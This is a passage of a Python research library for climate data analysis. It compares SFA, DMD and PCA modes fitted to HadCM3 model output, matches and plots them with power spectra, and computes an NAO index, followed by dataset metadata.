self.lons = lons\n self.models = wrapped_models\n self.models_n_modes = [m.model_modes for m in self.models]\n self.model_mode_tuples = [(model, mode) for model, n_modes \n in enumerate(self.models_n_modes) \n for mode in range(n_modes)]\n \n def retrieve_model_mode_index(self, model_n, mode_n):\n for i,t in enumerate(self.model_mode_tuples):\n if t==(model_n, mode_n):\n return i\n return None\n \n def train(self):\n if isinstance(self.X_train, list):\n for x, m in zip(self.X_train, self.models):\n m.train_model(x)\n else:\n for m in self.models:\n m.train_model(self.X_train)\n \n \n def _calculate_match_matrix(self, D):\n \n match_matrix = pcm.evaluate.all_to_all_comparison_metric(D, D)\n n1=0\n for n2 in self.models_n_modes:\n match_matrix[n1:n1+n2, n1:n1+n2] = np.nan\n n1+=n2\n match_matrix[np.tri(len(match_matrix), dtype=bool)]=np.nan\n return match_matrix\n \n def match(self, N=500, X_match=None):\n if isinstance(self.X_train, list):\n if X_match is None: X_match = self.X_train[0][:N]\n D = np.concatenate([m.decompose_data(X_match) for m in self.models])\n else:\n D = np.concatenate([m.model_project_modes(N=N) for m in self.models])\n self.match_matrix = self._calculate_match_matrix(D)\n self.groupings = self._assign_groupings(self.match_matrix)\n\n \n def corr_timeseries_to_index(self, index):\n model_series = np.concatenate([m.model_series for m in self.models], axis=1)\n mask = ~np.isnan(index)\n corr_sig = np.zeros((model_series.shape[1], 2))\n for i in range(model_series.shape[1]):\n corr_sig[i] = pearsonr(model_series[mask, i], index[mask])\n return corr_sig\n \n \n def plot_matched_modes(self, \n group_indices=[],\n col_titles=[], \n invert_match=True, \n figsize=None, \n sizetest=False,\n time_plot=None, # 'power_spectrum', #'power_spectrum' or 'time'\n time_colours=None,\n samp_freq=1, \n time_axis = ('frequency', 'months'),\n plot_kind = 'loglog',\n labels=None,\n titlesize=12,\n labelsize=10,\n ticksize=8,\n correlation_index=None,\n nperseg=256,\n ):\n\n if group_indices == []:\n group_indices=list(np.arange(len(self.groupings)))\n\n # convenience variables\n max_modes = np.max(self.models_n_modes)\n latslen, lonslen = len(self.lats), len(self.lons)\n n_plot_rows=len(group_indices)\n add_time_plot = True if time_plot in ['power_spectrum', 'time'] else False\n n_plot_cols=len(self.models)+add_time_plot\n\n if correlation_index is not None:\n corr_sig = self.corr_timeseries_to_index(correlation_index)\n\n if not sizetest:\n # Collect mode snaps\n data = np.zeros((len(self.models), max_modes, latslen, lonslen))\n for i, m in enumerate(self.models):\n data[i, :self.models_n_modes[i]] = \\\n m.model_mode_snaps(latslen, lonslen)\n data = normalise_fields(data)\n\n # set up plot\n fig = plt.figure(figsize = figsize)\n gsn = gridspec.GridSpec(n_plot_rows, n_plot_cols, figure=fig)\n map_proj = ccrs.PlateCarree()\n\n selected_groupings = [g for i,g in enumerate(self.groupings) if i in group_indices]\n\n for n, group in enumerate(selected_groupings):\n\n if not sizetest:\n # colorbar max extent same across group row\n v_abs_max = np.nanmax([np.nanmax(abs(data[i,m])) \n for i,m in enumerate(group) \n if m is not None])\n\n # first non-None in group\n first_n, first_m = [(i,m) for i,m in enumerate(group) \n if m is not None][0]\n\n for model_n, mode in enumerate(group):\n invert_field=False\n #v_abs_max = np.percentile(abs(data[i,m]), 99)\n\n gs0 = gridspec.GridSpecFromSubplotSpec(1, 2,\n subplot_spec=gsn[n_plot_cols*n+model_n+add_time_plot], \n width_ratios=[20,1],)\n\n ax = plt.subplot(gs0[0], projection=map_proj)\n cax = plt.subplot(gs0[1])\n\n if mode is not None and not sizetest:\n\n # select mode field, negate if appropriate, plot\n z = data[model_n, mode]\n if invert_match:\n invert_field=np.nansum(z*data[first_n, first_m])<0\n if invert_field: \n z=-z\n\n xz = xr.DataArray(z, \n coords = [self.lats, self.lons], \n dims=['latitude', 'longitude'])\n\n im=xz.plot(ax = ax, transform=map_proj, \n cmap=cmocean.cm.balance, \n vmin=-v_abs_max, vmax=v_abs_max, \n add_colorbar=False)\n\n if mode is not None:\n ax.coastlines()\n\n if labels=='number':\n # Annotate with mode number\n\n ax.text(0.5,-0.17, 'mode {}'.format(mode),\n size=labelsize, ha=\"center\", \n transform=ax.transAxes)\n\n elif labels=='info':\n # Annotate with mode number\n\n ax.text(0.5,-0.17, self.models[model_n].mode_info(mode),\n size=labelsize, ha=\"center\", \n transform=ax.transAxes)\n\n if correlation_index is not None:\n corr, p_val = corr_sig[\n self.retrieve_model_mode_index(model_n, mode)\n ]\n ax.text(0.5,-0.3, 'corr {:.3f}, p-val {:.3f}'.format(\n -corr if invert_field else corr, p_val), \n size=labelsize, ha=\"center\", \n transform=ax.transAxes)\n\n if labels=='match':\n # Annotate with mode number\n mode_tuples = [(i, m) for i, m in enumerate(group) \n if (i,m)!=(model_n, mode)]\n\n if np.all([tup[1] is not None for tup in mode_tuples]):\n\n m1, m2 = [self.retrieve_model_mode_index(*tup) \n for tup in mode_tuples]\n\n metric=np.nanmax(\n [self.match_matrix[m1,m2], \n self.match_matrix[m2,m1]])\n ax.text(0.5,-0.17, '<- m = {:.3f} ->'.format(metric), \n size=labelsize, ha=\"center\", \n transform=ax.transAxes)\n\n\n if not sizetest:\n if model_n==(len(self.models)-1):\n cbar = plt.colorbar(im, cax=cax)\n cbar.ax.tick_params(labelsize=ticksize) \n\n else:\n cax.axis('off')\n\n if col_titles!=[]:\n if n==0:\n ax.set_title(col_titles[model_n], fontsize=titlesize)\n\n if time_plot is not None:\n\n # place to store lines for legend\n legend_lines_dict={}\n\n\n for i in range(n_plot_rows):\n # create axis\n gs0 = gridspec.GridSpecFromSubplotSpec(1, 2,\n subplot_spec=gsn[n_plot_cols*i], \n width_ratios=[20,1])\n ax = plt.subplot(gs0[0])\n\n # include power spectrum to the left of the mode fields\n if time_plot=='power_spectrum':\n\n # plot power spectrum\n self._add_spectrum_plot(self.groupings[i], \n ax, \n samp_freq, \n include_legend=False,\n labels=col_titles,\n time_axis = time_axis, \n plot_kind = plot_kind,\n fontsize=labelsize,\n colours=time_colours,\n nperseg=nperseg)\n\n self._modify_ticksize(ax, ticksize)\n\n # store line labels\n for line, label in zip(*ax.get_legend_handles_labels()):\n legend_lines_dict[label]=line\n\n\n elif time_plot=='time':\n # create axis\n if time_colours is None:\n prop_cycle = plt.rcParams['axes.prop_cycle']\n colours = prop_cycle.by_key()['color']\n else:\n colours=time_colours\n time_labels = col_titles\n if time_labels==[]:\n time_labels=np.arange(self.groupings[i])\n\n y0=None\n for model_n, mode_n in enumerate(self.groupings[i]):\n if mode_n is not None:\n if y0 is None:\n y0 = self.models[model_n].model_series[:,mode_n]\n y0 = y0-y0.mean()\n\n y = self.models[model_n].model_series[:,mode_n]\n y = y-y.mean()\n y = y/y.std()\n if np.dot(y, y0)<0: y = -y\n ax.plot(y, color=colours[model_n], label=time_labels[model_n], zorder=-model_n, alpha=0.5)\n\n # store line labels\n for line, label in zip(*ax.get_legend_handles_labels()):\n legend_lines_dict[label]=line\n\n # add legend to last axis\n legend_labels = list(legend_lines_dict.keys())\n legend_lines = [legend_lines_dict[label] for label in legend_labels]\n ax.legend(legend_lines, legend_labels, \n loc = 'best', fontsize=labelsize)\n\n\n plt.tight_layout()\n return fig\n\n \n def _add_spectrum_plot(self, grouping, ax, samp_freq,\n time_axis = ('frequency', 'months'), \n plot_kind = 'loglog',\n include_legend=False,\n labels=[], \n fontsize=12,\n nperseg=256,\n colours=None\n ):\n \"\"\"\n args:\n samp_freq: the time spacing, in months\n \"\"\"\n if labels==[]:\n labels=np.arange(len(grouping))\n\n # plot types dict\n plots_dict = {'loglog':ax.loglog, \n 'semilogy':ax.semilogy,\n 'linear':ax.plot}\n # check inputs\n if plot_kind not in plots_dict.keys():\n raise ValueError(\n 'plot_kind : {} not valid. Must be one of {}'.format(\n plot_kind,plots_dict.keys())\n )\n\n if time_axis[0] not in ('frequency', 'period') or \\\n time_axis[1] not in ('months', 'years'):\n raise ValueError(\n 'time_axis : {} not valid. Must be one of {}'.format(\n time_axis, (('frequency', 'period'), ('months', 'years')))\n )\n\n def welsh_time_axis_modifier(x1, fs, time_axis, nperseg):\n '''Function completes welsh power spectrum analysis and modifes\n output for the time axis wanted'''\n x1 = x1/np.std(x1)\n f, Pxx_spec = signal.welch(x1, fs, 'flattop', \n nperseg, scaling='spectrum')\n if time_axis[1]=='years':\n f = f*12\n if time_axis[0]=='period':\n f = f[1:]**-1\n Pxx_spec = Pxx_spec[1:]\n return f, Pxx_spec\n\n fs = samp_freq\n\n if colours is None:\n prop_cycle = plt.rcParams['axes.prop_cycle']\n colours = prop_cycle.by_key()['color']\n\n for n, N in enumerate(grouping):\n\n if N is not None:\n x1 = self.models[n].model_series[:,N]\n f, Pxx_spec = welsh_time_axis_modifier(x1, fs, time_axis, nperseg)\n plots_dict[plot_kind](f, np.sqrt(Pxx_spec), color=colours[n], label=labels[n])\n\n plt.xlabel('{} ${}{}'.format(*time_axis,'^{-1}$' if time_axis[0] == 'frequency' else '$'), \n size=fontsize)\n plt.ylabel('Power spectrum', size=fontsize)\n\n if include_legend:\n ax.legend(framealpha=0, loc='best', fontsize=fontsize)\n\n \n def _modify_ticksize(self, ax, ticksize):\n ax.tick_params(axis=\"x\", labelsize=ticksize)\n ax.tick_params(axis=\"y\", labelsize=ticksize)\n \n\n def _assign_groupings(self, match_matrix, print_steps=False):\n match_matrix = match_matrix.copy()\n\n # matches by order\n xs, ys = np.meshgrid(np.arange(len(match_matrix)),\n np.arange(len(match_matrix)))\n ms = match_matrix.flatten()\n xs = xs.flatten()\n ys = ys.flatten()\n match_order = sorted(list(zip(ms, xs,ys)), key=lambda a: -sortnan(a[0]))\n\n # find all model number combinations\n Is, Js = np.meshgrid(np.arange(3), np.arange(3))\n mask = np.triu(np.ones((3,3), dtype=bool), k=1)\n model_combos = list(zip(Is[mask], Js[mask]))\n\n\n # keep track of the matches already made\n used = [zeros_line(i,N,len(self.models)) \n for i, N in enumerate(self.models_n_modes)]\n\n # initiate empty set of matches\n sets = np.zeros((np.sum(self.models_n_modes), len(self.models_n_modes)))\n sets[:]=np.nan\n\n\n for match in match_order:\n outcome=None\n\n # if the match metric is nan skip\n # this indicates that the two indices are from the same model\n if np.isnan(match[0]):\n continue\n\n # model_mode_tup is (model_num, model_index)\n model_mode_tup1 = self.model_mode_tuples[match[1]]\n model_mode_tup2 = self.model_mode_tuples[match[2]]\n\n # if either (model, index) pair already has a match to the \n # other model then skip\n if used[model_mode_tup1[0]][model_mode_tup1[1], model_mode_tup2[0]]:\n continue\n\n if used[model_mode_tup2[0]][model_mode_tup2[1], model_mode_tup1[0]]:\n continue\n\n # if both models already have a match to another model and their match\n # indexes arent the same, then skip, else combine the previous rows\n if (model_mode_tup1[1] in sets[:,model_mode_tup1[0]]) and \\\n (model_mode_tup2[1] in sets[:,model_mode_tup2[0]]):\n outcome='combine'\n # find the rows where both these things have another match\n row1 = sets[sets[:,model_mode_tup1[0]]==model_mode_tup1[1]][0]\n row2 = sets[sets[:,model_mode_tup2[0]]==model_mode_tup2[1]][0]\n\n # do these rows clash\n clash = np.any([not_match_not_nan(x,y) for x,y in zip(row1, row2)])\n\n # if they clash skip this\n if clash:\n continue\n\n # otherwise combine these rows\n new_row = [x if not np.isnan(x) else y for x,y in zip(row1, row2)]\n\n # and remove the old rows by...\n mask = sets[:,model_mode_tup2[0]]!=model_mode_tup2[1]\n # replacing one of them with the new row\n sets[sets[:,model_mode_tup1[0]]==model_mode_tup1[1]] = new_row\n # and removing the other one completely\n sets = sets[mask]\n\n # if one of the models has a match to another index then combine these\n elif (model_mode_tup1[1] in sets[:,model_mode_tup1[0]]) or \\\n (model_mode_tup2[1] in sets[:,model_mode_tup2[0]]):\n \n outcome='slot'\n in1 = model_mode_tup1[1] in sets[:,model_mode_tup1[0]]\n in2 = model_mode_tup2[1] in sets[:,model_mode_tup2[0]]\n\n # find the rows where both one model has index\n mask = (sets[:,model_mode_tup1[0]]==model_mode_tup1[1]) | \\\n (sets[:,model_mode_tup2[0]]==model_mode_tup2[1])\n\n new_row = sets[mask][0]\n\n if in1:\n new_row[model_mode_tup2[0]]=model_mode_tup2[1]\n elif in2:\n new_row[model_mode_tup1[0]]=model_mode_tup1[1]\n\n sets[mask]=new_row\n\n # if neither models are in the set already\n else:\n outcome='add'\n # first empty row of sets\n row_n = np.argmax(np.isnan(sets).sum(axis=1)==sets.shape[1])\n\n # make up the set\n new_row = np.array([np.nan]*len(self.models))\n new_row[model_mode_tup1[0]] = model_mode_tup1[1]\n new_row[model_mode_tup2[0]] = model_mode_tup2[1]\n\n # inset set into sets\n sets[row_n]=new_row\n\n\n # mark model-indexes as having a match to other model\n for i, j in model_combos:\n\n if not (np.isnan(new_row[i]) or np.isnan(new_row[j])):\n used[i][int(new_row[i]), j] = True\n used[j][int(new_row[j]), i] = True\n\n set_ = [np.nan]*len(self.models)\n set_[model_mode_tup1[0]] = model_mode_tup1[1]\n set_[model_mode_tup2[0]] = model_mode_tup2[1]\n\n if print_steps:\n print('\\n')\n print(sets[np.isnan(sets).sum(axis=1)!=sets.shape[1]], set_, outcome)\n\n\n # Add unmatched modes\n all_modes = [set(range(modes)) for modes in self.models_n_modes]\n matched_modes = [set(non_nan(sets[:,n])) for n in range(len(self.models))]\n unmatched_modes = [a_m - m_m for a_m, m_m in zip(all_modes, matched_modes)]\n\n for n, modes in enumerate(unmatched_modes):\n for mode in modes:\n # next empty row\n row_n = np.argmax(np.isnan(sets).sum(axis=1)==sets.shape[1])\n\n # build up set\n set_ = [np.nan]*len(self.models)\n set_[n]=mode\n sets[row_n]=set_\n\n # drop rows from set which are all nans \n sets = sets[np.isnan(sets).sum(axis=1)!=sets.shape[1]]\n\n # change to list form with Nones\n sets = [[int(n) if not np.isnan(n) else None for n in s] for s in sets]\n \n return sets\n \ndef closest_point_values(ds, lat, lon):\n lons_, lats_ = np.meshgrid(ds.longitude.values.astype(float),\n ds.latitude.values.astype(float))\n lons_ = lons_.reshape(np.product(lons_.shape))\n lats_ = lats_.reshape(np.product(lons_.shape))\n coords1 = np.vstack([lats_, lons_]).T\n coords2 = np.array([[lat, lon]])\n dists = pcm.generate.calculate_central_angle(coords1, coords2)\n closest = np.argmin(dists)\n clat, clon =lats_[closest], lons_[closest]\n data = ds.sel(latitude=clat, longitude=clon)\n return data\n \ndef calculate_point_index(da, coords=[(0,0)], coeffs=[1]):\n '''\n Args:\n coords: list of tuples of (lat, lon) for index\n coeffs: +1/-1 coefficient to use to calculate index\n '''\n \n da = pcm.process.signal_processing(da,\n agg_to_year = False,\n add_global_warming_signal = False,\n apply_standard_scaler=True,\n apply_area_weighting=False,\n normalise_by_year = False,\n normalise_by_rolling_year = False,\n normalise_by_month=True)\n \n series = [closest_point_values(da, lat, lon) for lat, lon in coords]\n \n index = series[0]*coeffs[0]\n \n for i in range(1,len(series)):\n index = index+series[i]*coeffs[i]\n return index\n\n\ndef calculate_nao_index(da):\n \"\"\"From details outlined here \n https://www.esrl.noaa.gov/psd/data/20thC_Rean/timeseries/monthly/NAO/\n \"\"\"\n # [Lisbon, Reykjavik]\n data = calculate_point_index(da, \n coords=[(37.71,-9.14), (64.13,-21.93)], \n coeffs=[1, -1])\n return data\n \n##############################################\n# BUTTER FILTER\n##############################################\n\nfrom scipy.signal import butter, lfilter, freqz\n\ndef butter_lowpass(cutoff, fs, order=5):\n nyq = 0.5 * fs\n normal_cutoff = cutoff / nyq\n b, a = butter(order, normal_cutoff, btype='low', analog=False)\n return b, a\n\ndef butter_lowpass_filter_2d(data, cutoff, fs, order=5):\n \"\"\"\n params:\n data (2D array): shape [time, measurements]\n cutoff (float): low pas cutoff frequency in Hertz\n fs (float): sampling frequency in Hertz\n \"\"\"\n b, a = butter_lowpass(cutoff, fs, order=order)\n filtered_data = np.empty_like(data)\n for i in range(data.shape[1]):\n filtered_data[:,i] = lfilter(b, a, data[:,i])\n return filtered_data\n\ndef filter_to_months(ds, months):\n month_mask = np.vectorize(lambda x : x in months)(\n ds.time.values.astype('datetime64[M]').astype(int) % 12 + 1\n )\n return ds.sel(time=month_mask)\n\n\nif __name__ == '__main__':\n \n # drift or all orcings run\n run='drift' # 'drift'/'all'\n months=[i for i in range(1,13)]# [11,12,1,2,3,4]\n plotname_addition=\"\" #default =\"\"\n save=False\n \n \n file_detais = {'drift':\n {'filename':\"temp236_apm_Euroclim500_HadCM3_DRIFT_r1_080012_200011.nc\",\n \"pfilename\":\"p_apm_Euroclim500_HadCM3_DRIFT_r1_140012_200011.nc\",\n 'height_num':10,\n 'pheight_num':13,\n },\n 'all':\n {'filename':\"temp236_apm_Euroclim500_HadCM3_ALL_r1_140012_200011.nc\",\n \"pfilename\":\"p_apm_Euroclim500_HadCM3_ALL_r1_080012_140011.nc\",\n 'height_num':11,\n 'pheight_num':15,\n },\n }\n \n data_filename = \"/exports/csce/datastore/geos/users/s1205782/climate_data/HadCM3_initial/\" \\\n + file_detais[run]['filename']\n \n pdata_filename = \"/exports/csce/datastore/geos/groups/TITAN/aschurer/EuroClim500/\" \\\n + file_detais[run]['pfilename']\n \n ds_t = xr.open_dataset(data_filename)\n ds_p = xr.open_dataset(pdata_filename)\n ds = xr.merge([ds_t.temp236, ds_p.p])\n \n ds = ds.rename({\n \"time0\": \"time\",\n \"longitude0\": \"longitude\",\n \"latitude0\": \"latitude\",\n })\n \n z_name = 'z{}_height'.format(file_detais[run]['height_num'])\n ds = ds.squeeze(z_name).drop(z_name)\n \n pz_name = 'z{}_msl'.format(file_detais[run]['pheight_num'])\n ds = ds.squeeze(pz_name).drop(pz_name)\n \n ds['features'] = pcm.process.signal_processing(ds.temp236,\n agg_to_year = 0,\n add_global_warming_signal = 0,\n apply_standard_scaler=0,\n apply_area_weighting=1,\n normalise_by_year = 0,\n normalise_by_rolling_year = 0,\n normalise_by_month=1)\n ds['features'] = ds['features'] - ds['features'].mean(dim=['time'])\n \n # apply month filtering\n ds_x = filter_to_months(ds, months).isel(time=slice(-1000, None))\n\n n_lats = ds_x.latitude.shape[0]\n n_lons = ds_x.longitude.shape[0]\n lats=ds_x.latitude.values\n lons=ds_x.longitude.values\n\n x = ds_x.features.values.reshape(ds_x.time.shape+(np.product(ds_x.features.shape[1:]),))\n X_train = x[~np.any(np.isnan(x), axis=(1))].astype(np.float64)\n nao_index = calculate_nao_index(ds_x.p)\n \n # select models\n m1 = wrapped_sfa(10, 50)\n m2 = wrapped_dmd(10)\n m3 = wrapped_pca(10)\n wrapped_models= [m1, m2, m3]\n\n # instantiate comparison model wrapper\n MM = multi_model_application(X_train, lats, lons, wrapped_models)\n \n MM.train()\n MM.match(N=200)\n print(MM.groupings)\n \n MM.plot_matched_modes(invert_match=True, \n figsize=(34,50), \n group_indices=[],\n col_titles=['SFA', 'DMD', 'PCA'], \n sizetest=False, \n power_spectrum=True,\n samp_freq=1, \n time_axis = ('period', 'years'),\n plot_kind = 'loglog',\n labels=None,\n titlesize=30,\n labelsize=20,\n ticksize=16,\n #correlation_index=nao_index.values,\n )\n if save:\n savename = 'power_spectrum_fields_{}.png'.format(\n run if plotname_addition==\"\" else run + \"_\" + plotname_addition\n )\n plt.savefig(savename)\n\n \n\n plt.show()\n \n \n MM.plot_matched_modes(invert_match=True, \n figsize=(30,4.5), \n group_indices=[0],\n col_titles=['SFA', 'DMD', 'PCA'], \n sizetest=False, \n power_spectrum=True,\n samp_freq=1, \n time_axis = ('period', 'years'),\n plot_kind = 'loglog',\n labels=None,\n titlesize=40,\n labelsize=30,\n ticksize=25,\n #correlation_index=nao_index.values,\n )\n plt.tight_layout()\n plt.savefig('poster_hadcm3_gw.png', transparent=True, dpi=300, pad_inches=1)\n plt.show()", "sub_path": "notebooks/notebook_lib.py", "file_name": "notebook_lib.py", "file_ext": "py", "file_size_in_byte": 35236, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sklearn.decomposition.PCA", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.matmul", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 55, "usage_type": "attribute"}, {"api_name": "mdp.nodes.PCANode", "line_number": 70, "usage_type": "call"}, {"api_name": "mdp.nodes.SFANode", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 112, "usage_type": "call"}, {"api_name": "pydmd.DMD", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 149, "usage_type": "attribute"}, {"api_name": "numpy.newaxis", "line_number": 150, "usage_type": "attribute"}, {"api_name": "numpy.real", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.newaxis", "line_number": 167, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.nanargmax", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.nansum", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 200, "usage_type": "attribute"}, {"api_name": "pyclimine.evaluate.all_to_all_comparison_metric", "line_number": 231, "usage_type": "call"}, {"api_name": "pyclimine.evaluate", "line_number": 231, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 234, "usage_type": "attribute"}, {"api_name": "numpy.tri", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 236, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 252, "usage_type": "call"}, {"api_name": "scipy.stats.pearsonr", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 299, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 299, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 300, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 300, "usage_type": "name"}, {"api_name": "cartopy.crs.PlateCarree", "line_number": 301, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 301, "usage_type": "name"}, {"api_name": "numpy.nanmax", "line_number": 309, "usage_type": "call"}, {"api_name": "matplotlib.gridspec.GridSpecFromSubplotSpec", "line_number": 321, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 321, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 325, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 325, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 326, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 326, "usage_type": "name"}, {"api_name": "numpy.nansum", "line_number": 333, "usage_type": "call"}, {"api_name": "xarray.DataArray", "line_number": 337, "usage_type": "call"}, {"api_name": "cmocean.cm", "line_number": 342, "usage_type": "attribute"}, {"api_name": "numpy.all", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 382, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 392, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 392, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpecFromSubplotSpec", "line_number": 410, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 410, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 413, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 413, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 440, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 440, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 458, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 472, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 472, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 490, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 513, "usage_type": "call"}, {"api_name": "scipy.signal.welch", "line_number": 514, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 514, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 526, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 526, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 534, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 536, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 536, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 538, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 538, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 553, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 553, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 554, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 561, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 561, "usage_type": "call"}, {"api_name": "numpy.triu", "line_number": 562, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 562, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 571, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 571, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 572, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 580, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 605, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 612, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 646, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 646, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 649, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 649, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 660, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 664, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 670, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 681, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 681, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 684, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 689, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 692, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 697, "usage_type": "call"}, {"api_name": "numpy.product", "line_number": 699, "usage_type": "call"}, {"api_name": "numpy.product", "line_number": 700, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 701, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 702, "usage_type": "call"}, {"api_name": "pyclimine.generate.calculate_central_angle", "line_number": 703, "usage_type": "call"}, {"api_name": "pyclimine.generate", "line_number": 703, "usage_type": "attribute"}, {"api_name": "numpy.argmin", "line_number": 704, "usage_type": "call"}, {"api_name": "pyclimine.process.signal_processing", "line_number": 716, "usage_type": "call"}, {"api_name": "pyclimine.process", "line_number": 716, "usage_type": "attribute"}, {"api_name": "scipy.signal.butter", "line_number": 753, "usage_type": "call"}, {"api_name": "numpy.empty_like", "line_number": 764, "usage_type": "call"}, {"api_name": "scipy.signal.lfilter", "line_number": 766, "usage_type": "call"}, {"api_name": "numpy.vectorize", "line_number": 770, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 805, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 806, "usage_type": "call"}, {"api_name": "xarray.merge", "line_number": 807, "usage_type": "call"}, {"api_name": "pyclimine.process.signal_processing", "line_number": 821, "usage_type": "call"}, {"api_name": "pyclimine.process", "line_number": 821, "usage_type": "attribute"}, {"api_name": "numpy.product", "line_number": 839, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 840, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 840, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 840, "usage_type": "attribute"}, {"api_name": "{'SFANode': 'mdp.nodes.SFANode', 'PCANode': 'mdp.nodes.PCANode'}", "line_number": 844, "usage_type": "call"}, {"api_name": "{'DMD': 'pydmd.DMD'}", "line_number": 845, "usage_type": "call"}, {"api_name": "{'PCA': 'sklearn.decomposition.PCA'}", "line_number": 846, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 875, 